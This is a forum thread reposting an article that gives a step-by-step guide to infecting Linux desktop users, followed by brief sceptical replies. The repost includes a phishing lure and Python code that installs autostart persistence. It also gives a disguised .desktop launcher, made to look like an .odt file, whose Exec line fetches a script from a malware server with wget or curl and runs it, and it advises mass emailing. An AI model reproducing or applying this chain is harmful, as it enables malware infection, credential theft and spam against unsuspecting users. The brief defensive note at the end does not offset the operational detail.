News
news Scientists Find Evolutionary Link Between Horses and Rhinos
news New 40-seat 'Bio-Bus' runs on human waste
news Black Holes Align with Each Other
news Smelly Corpse Flower Set to Bloom
news Two New Subatomic Particles Discovered by CERN Physicists
news Shape-shifting home transforms throughout the year in response to changing temperatures
news Strange Russian Spacecraft Could Be Space Weapon
news Breakthrough: Comet Lander Detected Organic Molecules
news The man who can hear Wi-Fi wherever he walks
news Transylvania’s Haunted Forest, Known as Romania’s ‘Bermuda Triangle’: Hoia Baciu
news 'Killer robots' need to be strictly monitored, nations warn at UN meeting

Advertisement



Username:
Password: or Register
 
Thread Rating:
  • 1 Vote(s) - 1 Average
  • 1
  • 2
  • 3
  • 4
  • 5
How to write a Linux virus in 5 easy steps
Dial-up
Registered User
User ID: 105045
07-10-2012 04:41 AM

Posts: 5,410



Post: #1
How to write a Linux virus in 5 easy steps
Advertisement
Don't save attachments unless from a trusted and secure source. Also, watch out for infected USB sticks. Always reformat those, even new ones not found outside in the parking lot.


Link: Geek Zone
linux, posted: 11-Feb-2009 06:33

I should point out: The vulnerabilities we will be taking advantage of are 'features' of the most popular modern Linux desktop environments, Gnome and KDE. The actual core of Linux itself does not have any of these vulnerabilities. A Linux (or any other *nix) system without running Gnome or KDE will not exhibit any of these problems, which is one of the huge advantages of properly separating the core OS from other applications such as the desktop environment.
[snip]

Getting users to open attachments: Check out these nude shots!

So, the email will have to read something like:

Whoa, check out these nude shots of...!
(if the attachment doesn't want to open just save it to your desktop and open it...)

That would sound suspicious to most of us, but 'most' is not 'all' and user stupidity is everywhere. Besides, many users of web-based email clients are used to the save-first routine anyway.
[snip]

Getting attachments to execute

When you save an email attachment under Linux, the execute flag is normally NOT set and thus, the file can't be executed just by clicking on it. So, no luck?

Not so fast. Modern desktop environments, such as Gnome and KDE, conveniently offer a nice "workaround" called 'launchers'. Those are small files that describe how something should be started. Just a few lines that specify the name, the icon that should be displayed and the actual command to execute. Conveniently, the syntax of those launcher files is the same for Gnome and KDE. And those launchers don't have to have any execute permissions set on them! Desktop environments treat those files as a special case, so when you click on them Gnome or KDE will happily execute the command that was specified within the launcher description and without the need for the execute bit to be set on the launcher itself. Now we are getting somewhere!
[snip]

You don't need to be root to 0wn someone

None of that so far required root privileges. And our script now can do whatever it wishes to do within the confines of the user account. Confined it may be, but that doesn't prevent the possibility of significant damage to be done.

For example, it can start to pilfer through the user's address book to harvest email addresses, send them off to our malware server, start sending spam email or it can spread itself by email. It can install a Firefox extension that captures passwords as the user types them. It may start to share the user's desktop via VNC without the user's knowledge. It can start a background daemon that pops up ads. Linux adware!
[snip]

Autostart after reboot

Users do not need root privileges in order to configure certain applications for autolaunch when they are logging into their own user sessions. That is because they are only making changes to their own session and user account, not the underlying system settings.
[snip]

Fortunately, the modern desktop environments have their own set of commands which they are autostarting on login. In the case of Gnome, take a look at what you find in ~/.config/autostart (this directory may not exist yet, if you have not configured any apps for autostart). That's right! More launchers! Those are run every time the user logs into Gnome. For KDE it's even simpler: Just link to your executable from within the ~/.kde/Autostart directory.

Our malware then only needs to create an appropriate entry in those directories and it will start to run whenever the user logs in!
[snip]


Compact step-by-step guide

Ok, so here is the summary then, which also fills in a few more specific details:

1. Write a piece of malware of your choice. Maybe as a Python script? Good language, efficient code, pre-installed in most Linux distros and powerful standard library support (for example, libraries for sending HTTP requests and handling SMTP are part of most standard installs). Place that malware on some web-server.

2. Your malware needs the ability to install a launcher for itself so that it is started whenever the user logs in. As mentioned, for Gnome that means creating a launcher description in the ~/.config/autostart folder. For KDE just link to your executable from within the ~/.kde/Autostart directory. To do that the malware code can either just force the issue and copy a launcher or link to itself into both locations (creating any directories along the way if they don't exist) or it can be a bit smarter and choose the right thing to do based on the desktop environment that it detects.

For example, to create the shortcut for KDE, all you need to write in Python is:

import os
uname = os.getlogin()
drop_dir = “/home/%s/.kde/Autostart” % uname)
os.makedirs(drop_dir)
os.symlink("/home/%s/.local/.hidden/s.py" % uname, drop_dir+“/s.py")

For Gnome the Python script instead needs to write a launcher into the proper directory:

import os
relauncher_str = """
[Desktop Entry]
Type=Application
Name=Malware
Exec=python .local/.hidden/s.py
Icon=system-run
"""
uname = os.getlogin()
drop_dir = “/home/%s/.config/autostart” % uname
os.makedirs(drop_dir)
f = open(drop_dir+”/Malware.desktop”, “w”)
f.write(relauncher_str)
f.close()

Writing these autostart entries is probably some of the first action that your malware should perform.

3. Now create a desktop launcher file for the installer of the malware, which is different than the launcher we use to restart the malware after a reboot. The desktop launcher for the installer is what we send as attachment in the email to the targeted user. It's what the user clicks on after they saved it. Try something like this:

[Desktop Entry]
Type=Application
Name=some_text.odt
Exec=bash -c 'URL=http://www.my_malware_server.com/s.py ;
DROP=~/.local/.hidden ;
mkdir -p $DROP;
if [ -e /usr/bin/wget ] ;
then wget $URL -O $DROP/s.py ;
else curl $URL -o $DROP/s.py ; fi;
python $DROP/s.py'
Icon=/usr/share/icons/hicolor/48x48/apps/ooo-writer.png

Note that we have specified a name that is harmless looking and even chose an icon that makes it look like a normal document (that particular icon is present on both Ubuntu (Gnome) and Kubuntu (KDE) systems, but annoyingly not on Fedora). If you claim to send nude shots in the email, just give it a name that makes it sound like an image (something with .jpg at the end) and chose one of the appropriate standard image icons.

The Exec line is a bit longer now, because we have to account for the possibility that either wget is installed or curl. For example, Ubuntu systems usually have wget, while Fedora comes with curl. So, we pass the appropriate commands to bash in order to check which one is present and then call the correct command to download the malware. I'm not a bash expert, so there might be a much more efficient way to do this. But you get the idea. Also, in that line we are creating a good location for the script ($DROP), which is not immediately obvious. The mkdir command with the -p option will silently create whatever parent directories are necessary. The target directory is in the user's home, hidden away in some innocent looking local directory and can only be seen when also displaying hidden files. The /tmp directory of course is not a good place for our malware, since it is wiped with each reboot.

Save this launcher file under the name you specified with the Name line, but add '.desktop' to the end of the actual file name. So, in our case, you would save the file as 'some_text.odt.desktop'. When you place this on your desktop you will see that Gnome or KDE will treat it in a special way, not displaying the '.desktop' extension. So, the file just appears as 'some_text.odt'. Of course, that also means that the mail attachment will have this extension as well. Some users may notice, many others will not.

4. Attach this file to an email, which prompts the recipient to save and open the attachment. As explained, once it has been saved it will just appear as 'some_text.odt' on the user's desktop. And with the icon we have chosen in the launcher description it will look quite harmless.

5. Send this email out to as many email addresses as you can get a hold of.

Voila! A Linux virus in 5 simple steps. Every user that saves and opens the attachment you have sent them will get themselves infected with the malware script of your choice, which is then also restarted whenever the user logs in again.
[snip]

Solutions for the problem

The easiest solution to prevent this kind of problem is to not just blindly click on attachments that people have sent you.
[snip]
(This post was last modified: 07-10-2012 04:47 AM by Dial-up.) Quote this message in a reply
Advertisement

Currahee
We stand alone, together
User ID: 107477
07-10-2012 04:47 AM

Posts: 13,368



Post: #2
RE: How to write a Linux virus in 5 easy steps
What they describe is not a virus. And 5 easy steps? If you got that routine to work 1 out of 10,000 attempts I'd still consider it lucky.




$0.02
Peace

“You don’t want to become so open-minded that the wind can whistle between your ears.” ~Terence McKenna
Quote this message in a reply
Dial-up
Registered User
User ID: 105045
07-10-2012 04:50 AM

Posts: 5,410



Post: #3
RE: How to write a Linux virus in 5 easy steps
Currahee  Wrote: (07-10-2012 04:47 AM)
What they describe is not a virus. And 5 easy steps? If you got that routine to work 1 out of 10,000 attempts I'd still consider it lucky.




$0.02
Peace
The author does mention that it is not a virus. You have to go to the link in order to get his detailed explanation.

Yep, it's a real pain to 'infect' a linux machine.
Quote this message in a reply
I┴∀NIW∩˥˥Iʞ
NOT A SHEEPLE
User ID: 93317
07-10-2012 04:51 AM

Posts: 15,634



Post: #4
RE: How to write a Linux virus in 5 easy steps
Dial-up  Wrote: (07-10-2012 04:50 AM)
Currahee  Wrote: (07-10-2012 04:47 AM)
What they describe is not a virus. And 5 easy steps? If you got that routine to work 1 out of 10,000 attempts I'd still consider it lucky.




$0.02
Peace
The author does mention that it is not a virus. You have to go to the link in order to get his detailed explanation.

Yep, it's a real pain to 'infect' a linux machine.

why even do it? I mean why mess up a persons computer*
(This post was last modified: 07-10-2012 04:53 AM by I┴∀NIW∩˥˥Iʞ.) Quote this message in a reply
LoP Guest
lop guest
User ID: 107189
07-10-2012 04:52 AM

 



Post: #5
RE: How to write a Linux virus in 5 easy steps
a CPU is a Central Processing Unit.
Quote this message in a reply
LoP Guest
lop guest
User ID: 97775
07-10-2012 04:57 AM

 



Post: #6
RE: How to write a Linux virus in 5 easy steps
So basically, this was bs.
Quote this message in a reply
Dial-up
Registered User
User ID: 105045
07-10-2012 04:58 AM

Posts: 5,410



Post: #7
RE: How to write a Linux virus in 5 easy steps
ĶĨĽĿŨМľŃǺŢľ  Wrote: (07-10-2012 04:51 AM)
why even do it? I mean why mess up a persons computer*
It's not my cup of tea, but some script kiddies (governments, etc.) like to partake in such nefarious activities.
Quote this message in a reply
Dial-up
Registered User
User ID: 105045
07-10-2012 05:00 AM

Posts: 5,410



Post: #8
RE: How to write a Linux virus in 5 easy steps
LoP Guest  Wrote: (07-10-2012 04:57 AM)
So basically, this was bs.
No, just more difficult to comprise a linux machine.
Quote this message in a reply
Sonofabiscuit
Registered User
User ID: 105545
07-10-2012 05:01 AM

Posts: 2,738



Post: #9
RE: How to write a Linux virus in 5 easy steps
I'm not sure of the exact definition of a computer virus, but as it mentioned it's capable of self replication and doing a host of nasty stuff to you. Sounds like a virus to me, and calling it malware wont make you feel any better if you end up with it.
Quote this message in a reply












Contact UsConspiracy Forum. No reg. required! Return to TopReturn to ContentRSS Syndication

Valid XHTML 1.0 Transitional Valid CSS 2.1